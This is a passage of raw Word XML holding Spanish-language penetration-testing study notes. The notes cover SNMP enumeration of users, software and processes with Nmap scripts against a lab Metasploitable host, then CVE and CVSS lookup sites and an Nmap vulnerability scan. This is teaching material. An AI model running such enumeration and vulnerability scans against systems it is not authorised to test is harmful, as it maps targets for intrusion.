          <w:bCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B47">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Por motivos curiosos, el protocolo SNMP está mal configurado en muchos servidores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE06E1C" w14:textId="42EAAAA5" w:rsidR="00BB3B47" w:rsidRPr="00BB3B47" w:rsidRDefault="00BB3B47" w:rsidP="00BB3B47">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B47">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Para analizar los puertos UDP en Nmap usamos la opción -sU en vez de la -sS que es de los TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC6C59A" w14:textId="0B51FF5F" w:rsidR="00BB3B47" w:rsidRDefault="00BB3B47" w:rsidP="00C85AEF">
      <w:r>
        <w:t>Podríamos analizar si una máquina lo tiene con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D6031F" w14:textId="7CC4C38E" w:rsidR="00BB3B47" w:rsidRDefault="00BB3B47" w:rsidP="00C85AEF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B47">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo nmap -v -sU -p 161 (ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238F19B2" w14:textId="0436F7F1" w:rsidR="00BB3B47" w:rsidRDefault="00BB3B47" w:rsidP="00C85AEF">
      <w:r>
        <w:t>Ahora, sabiendo que Nmap tiene muchos script, tan solo podríamos preguntarle si tiene algo para SNMP con un listado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A85942" w14:textId="31518320" w:rsidR="00BB3B47" w:rsidRPr="00BB3B47" w:rsidRDefault="00BB3B47" w:rsidP="00C85AEF">
      <w:r w:rsidRPr="00BB3B47">
        <w:t>ls /usr/share/nmap/scripts | grep snmp*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0689965B" w14:textId="74FD8341" w:rsidR="00BB3B47" w:rsidRDefault="00BB3B47" w:rsidP="00C85AEF">
      <w:r>
        <w:t>Podemos hacer entonces uso de esos scripts tal y como lo hacemos con SMB</w:t>
      </w:r>
      <w:r w:rsidR="00507BAB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA157D0" w14:textId="77777777" w:rsidR="00507BAB" w:rsidRDefault="00507BAB" w:rsidP="00C85AEF"/>
    <w:p w14:paraId="7CE4F5CF" w14:textId="2FB7BABC" w:rsidR="00BB3B47" w:rsidRDefault="00BB3B47" w:rsidP="005F144D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>EJEMPLOS VISUALES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36838B8D" w14:textId="184F2227" w:rsidR="00BB3B47" w:rsidRPr="00BB3B47" w:rsidRDefault="00BB3B47" w:rsidP="005F144D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B47">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo nmap -v -sU -p 161 --script=snmp-win32-software.nse 192.168.52.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C0BC60" w14:textId="2EDE0304" w:rsidR="00BB3B47" w:rsidRDefault="00BB3B47" w:rsidP="005F144D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B47">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0193D02B" wp14:editId="761F7426">
            <wp:extent cx="5400040" cy="1726565"/>
            <wp:effectExtent l="0" t="0" r="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1726565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="162689EC" w14:textId="029EFF5C" w:rsidR="00BB3B47" w:rsidRDefault="00BB3B47" w:rsidP="005F144D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Usamos el script contra nuestro Windows Server Metasploiteable y vemos que nos devuelve mucho software que efectivamente está instalado en nuestra máquina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B71E2D" w14:textId="7F4DE235" w:rsidR="00BB3B47" w:rsidRDefault="00BB3B47" w:rsidP="005F144D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B47">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo nmap -v -sU -p 161 --script=snmp-win32-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3B47">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.nse 192.168.52.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3019A5FB" w14:textId="29345425" w:rsidR="00BB3B47" w:rsidRDefault="00BB3B47" w:rsidP="005F144D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B47">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="578CE3F6" wp14:editId="53122A02">
            <wp:extent cx="2728196" cy="3025402"/>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28196" cy="3025402"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="481A576A" w14:textId="11CCE566" w:rsidR="00BB3B47" w:rsidRDefault="00BB3B47" w:rsidP="005F144D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Como vemos, en esta ocasión SÍ es capaz de encontrar TODOS los usuarios del sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8937DE" w14:textId="755EEB87" w:rsidR="00507BAB" w:rsidRDefault="00507BAB" w:rsidP="005F144D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B47">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo nmap -v -sU -p 161 --script=snmp-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>processes</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3B47">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.nse 192.168.52.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F39457" w14:textId="7DC58D72" w:rsidR="00BB3B47" w:rsidRDefault="00507BAB" w:rsidP="005F144D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00507BAB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52895B9F" wp14:editId="52A6E345">
            <wp:extent cx="2199976" cy="135636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18164" cy="1367573"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD475A3" w14:textId="73B1DBFB" w:rsidR="00507BAB" w:rsidRDefault="00507BAB" w:rsidP="005F144D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>O Incluso puede listar TODOS los procesos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740A3EFA" w14:textId="46901F08" w:rsidR="00507BAB" w:rsidRDefault="00507BAB" w:rsidP="005F144D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51E40F0B" w14:textId="32039CC7" w:rsidR="00507BAB" w:rsidRDefault="00507BAB" w:rsidP="005F144D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Mención especial a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCC81A5" w14:textId="3DB8AAC1" w:rsidR="00507BAB" w:rsidRDefault="00507BAB" w:rsidP="005F144D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB3B47">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo nmap -v -sU -p 161 --script=snmp-win32-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3B47">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.nse 192.168.52.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49603B1B" w14:textId="707B77EA" w:rsidR="00507BAB" w:rsidRDefault="00507BAB" w:rsidP="005F144D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00507BAB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E7E22C3" wp14:editId="1A29958C">
            <wp:extent cx="5400040" cy="910590"/>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910590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB448FD" w14:textId="10B0AF8B" w:rsidR="00507BAB" w:rsidRDefault="00507BAB" w:rsidP="005F144D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Incluso puede listar el procesador y el hardware de la máquina. Ideal para una posterior explotación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E06297" w14:textId="77777777" w:rsidR="00C17599" w:rsidRDefault="00C17599" w:rsidP="00C17599">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="153EC621" w14:textId="0E35F360" w:rsidR="005F144D" w:rsidRPr="00C17599" w:rsidRDefault="005F144D" w:rsidP="00E961D1">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C17599">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Análisis de Vulnerabilidades:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E39B0D" w14:textId="4007D819" w:rsidR="00F12797" w:rsidRPr="00382356" w:rsidRDefault="00F12797" w:rsidP="00382356">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00382356">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>CVE Mitre:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B069948" w14:textId="77777777" w:rsidR="00382356" w:rsidRDefault="00F12797" w:rsidP="00F12797">
      <w:r>
        <w:t>cve.mitre.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FA1113" w14:textId="439824F9" w:rsidR="00F12797" w:rsidRDefault="00382356" w:rsidP="00F12797">
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00F12797">
        <w:t>s un sitio web donde se recopilan todas las vulnerabilidades que se van descubriendo. En la búsqueda podemos poner el nombre de un programa y su versión, descubierto antes en Nmap por ejemplo, y nos devolverá las vulnerabilidades encontradas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E84D09" w14:textId="42A74725" w:rsidR="00382356" w:rsidRDefault="00F12797" w:rsidP="00382356">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12797">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>Aunque por norma general recopila los exploits así como código fuente para explotar la vulnerabildidad, quizás sea mejor hacer una búsqueda en Google para encontrar código que la explote de mejor manera, algo más actual.</w:t>
      </w:r>
      <w:r w:rsidR="00465CBB">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Buscando en sitios como GitHub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12086B4A" w14:textId="309C1D6C" w:rsidR="00382356" w:rsidRPr="00382356" w:rsidRDefault="00382356" w:rsidP="00382356">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00382356">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>CVSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702186AF" w14:textId="79810B38" w:rsidR="00382356" w:rsidRDefault="00382356" w:rsidP="00382356">
      <w:r w:rsidRPr="00382356">
        <w:t>nvd.nist.gov/vuln-metrics/cvss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA219C1" w14:textId="5774D108" w:rsidR="00382356" w:rsidRDefault="00382356" w:rsidP="00382356">
      <w:r>
        <w:t>Sitio Web de EEUU, que mide la peligrosidad de una vulnerabilidad. Tan solo copiamos el código CVE-XXXXX de la vulnerabilidad y buscamos. Es importante centrarnos en vulnerabilidades altas por encima de las bajas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC6C0E8" w14:textId="15E3257A" w:rsidR="00382356" w:rsidRPr="00382356" w:rsidRDefault="00382356" w:rsidP="00382356">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00382356">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>CPE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7DDD06" w14:textId="77777777" w:rsidR="00382356" w:rsidRDefault="00382356" w:rsidP="00382356">
      <w:r>
        <w:t>Es una cadena de texto que separa valores por dos puntos “:” que indican el fabricante, la aplicación, la versión, etc…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DDB92A" w14:textId="5394DC23" w:rsidR="00382356" w:rsidRPr="00382356" w:rsidRDefault="00382356" w:rsidP="00382356">
      <w:r>
        <w:t>Por ejemplo :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260ACEBA" w14:textId="59452801" w:rsidR="00382356" w:rsidRDefault="00000000" w:rsidP="00382356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F7FD"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00382356">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="114B73"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>cpe:2.3:a:proftpd:proftpd:1.3.5:-:*:*:*:*:*:*</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="774CDE5B" w14:textId="28CF8D74" w:rsidR="00382356" w:rsidRDefault="00382356" w:rsidP="00382356">
      <w:r>
        <w:t>Esto nos permite identificar rápidamente vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D725B5B" w14:textId="2B5855E5" w:rsidR="00382356" w:rsidRPr="00382356" w:rsidRDefault="00382356" w:rsidP="00382356">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00382356">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>CVE Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C485C2E" w14:textId="510C7D8E" w:rsidR="00382356" w:rsidRDefault="00000000" w:rsidP="00382356">
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00382356" w:rsidRPr="008F4AA9">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>www.cvedetails.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1260BF9F" w14:textId="6B5EF600" w:rsidR="00382356" w:rsidRDefault="00382356" w:rsidP="00382356">
      <w:r>
        <w:t xml:space="preserve">Es un sitio web que agrupa </w:t>
      </w:r>
      <w:r w:rsidR="009D5497">
        <w:t>todo lo anterior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505F5E2F" w14:textId="147192CE" w:rsidR="005715C8" w:rsidRDefault="005715C8" w:rsidP="005715C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerabilidades con Nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00C85AEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6419921F" w14:textId="28B38EE1" w:rsidR="005715C8" w:rsidRDefault="005715C8" w:rsidP="005715C8">
      <w:r>
        <w:t>Nmap también es capaz de encontrar vulnerabilidades. También filtra los scripts por tipos y podemos pedirle que busque scripts específicos para las vulnerabilidades encontradas.</w:t>
      </w:r>
      <w:r w:rsidR="00406613">
        <w:t xml:space="preserve"> NO ES COMPARABLE A NESSUS, pero es una herramienta muy rápida y simple que puede ayudarnos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7D1009" w14:textId="19D3DBC7" w:rsidR="00BB00C8" w:rsidRPr="00BB00C8" w:rsidRDefault="00BB00C8" w:rsidP="00BB00C8">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB00C8">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>Recuerda que toda esta actividad manda una gran cantidad de paquetes a la red, por lo que si no vamos a tiro hecho, podemos causar la saturación de la red y quizás tumbar un host o que el sistema de protección de anomalías si lo tiene instalado nos bloquee el paso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2E3ECA" w14:textId="795ECE34" w:rsidR="005715C8" w:rsidRDefault="00000000" w:rsidP="005715C8">
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="005715C8" w:rsidRPr="003D213E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>nmap.org/book/nse-usage.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4519A224" w14:textId="1EEFF449" w:rsidR="005715C8" w:rsidRDefault="005715C8" w:rsidP="005715C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005715C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo nmap -v --reason -s</w:t>
      </w:r>
      <w:r w:rsidR="00BB00C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="005715C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -oX vulnerabilidadesnmap.xml --stylesheet="https://svn.nmap.org/nmap/docs/nmap.xsl" 192.168.52.132 --script=vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1713AF45" w14:textId="7457F745" w:rsidR="005715C8" w:rsidRPr="00465CBB" w:rsidRDefault="00863050" w:rsidP="00465CBB">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00465CBB">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">Una forma de poner dos ips sería  </w:t>
      </w:r>
      <w:r w:rsidRPr="00465CBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>192.168.52.130,132</w:t>
      </w:r>
      <w:r w:rsidR="00465CBB" w:rsidRPr="00465CBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00465CBB" w:rsidRPr="00465CBB">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>o en rango</w:t>
      </w:r>
      <w:r w:rsidR="00465CBB" w:rsidRPr="00465CBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.52.130-140</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C4BF02" w14:textId="05ABBE63" w:rsidR="00465CBB" w:rsidRPr="00BB00C8" w:rsidRDefault="00863050" w:rsidP="00BB00C8">
      <w:pPr>
        <w:pBdr>
